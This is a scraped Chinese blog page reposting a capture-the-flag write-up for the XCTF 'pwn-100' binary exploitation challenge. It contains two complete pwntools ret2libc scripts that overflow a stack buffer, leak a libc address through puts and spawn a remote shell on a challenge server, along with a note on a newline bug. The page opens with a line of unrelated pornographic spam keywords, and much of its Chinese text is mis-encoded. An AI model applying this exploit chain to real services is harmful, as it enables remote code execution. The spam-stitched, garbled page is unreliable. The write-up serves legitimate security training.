日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

[攻防世界 pwn]——pwn-100

發(fā)布時(shí)間:2024/4/17 编程问答 40 豆豆
生活随笔 收集整理的這篇文章主要介紹了 [攻防世界 pwn]——pwn-100 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

[攻防世界 pwn]——pwn-100

  • 題目地址: https://adworld.xctf.org.cn/
  • 題目:

checksec一下

IDA中


sub_40063D函數(shù)的作用就是讀入200個(gè)字符, 不然不退出循環(huán)

思路

leek出來(lái)一個(gè)地址, 然后找到libc, 計(jì)算偏移找到system 和 ‘/bin/sh’ 循環(huán)調(diào)用, 得到shell

from pwn import * from LibcSearcher import * #p = process("./pwn") p = remote("111.200.241.244",47030) elf = ELF('./pwn') #gdb.attach(p, "b *0x00000000004006B6") #context.log_level = 'debug' read_got = elf.got['read'] puts_plt = elf.plt['puts'] main_addr = 0x00000000004006B8 pop_rdi = 0x0000000000400763 ret = 0x00000000004004e1payload = 'a' * (0x40 + 0x8) + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(main_addr) payload = payload.ljust(200, 'a') p.sendline(payload) # <----- p.recvline()read_addr = u64(p.recvuntil('\n')[:-1].ljust(8,'\0')) print hex(read_addr) libc = LibcSearcher('read',read_addr) libc_base = read_addr - libc.dump('read') system_addr = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') payload = 'a' *(0x40 + 0x8) + p64(pop_rdi) + p64(binsh) + p64(system_addr) payload = payload.ljust(200, 'a') p.sendline(payload) p.interactive()

發(fā)現(xiàn)不可以, 思前想后,仔細(xì)檢查發(fā)現(xiàn)也不行, 無(wú)奈求救大佬。
注意上面箭頭的位置, 問(wèn)題就出現(xiàn)在這里。我們之前已經(jīng)輸入了200個(gè)字符, sendline后面會(huì)補(bǔ)上\n。也就是說(shuō)我們會(huì)剩下一個(gè)\n。會(huì)在接下來(lái)的讀取中讀取。也就是我們下面的payload都錯(cuò)位了。

嚶嚶嚶, 不過(guò)gets和scanf函數(shù)是需要’\n’, 作為終止符的。

exploit

from pwn import * from LibcSearcher import * #p = process("./pwn") p = remote("111.200.241.244",47030) elf = ELF('./pwn') #gdb.attach(p, "b *0x00000000004006B6") #context.log_level = 'debug' read_got = elf.got['read'] puts_plt = elf.plt['puts'] main_addr = 0x00000000004006B8 pop_rdi = 0x0000000000400763payload = 'a' * (0x40 + 0x8) + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(main_addr) payload = payload.ljust(200, 'a') p.send(payload) p.recvline()read_addr = u64(p.recvuntil('\n')[:-1].ljust(8,'\0')) print hex(read_addr) libc = LibcSearcher('read',read_addr) libc_base = read_addr - libc.dump('read') system_addr = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') payload = 'a' *(0x40 + 0x8) + p64(pop_rdi) + p64(binsh) + p64(system_addr) payload = payload.ljust(200, 'a') p.sendline(payload) p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[攻防世界 pwn]——pwn-100的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。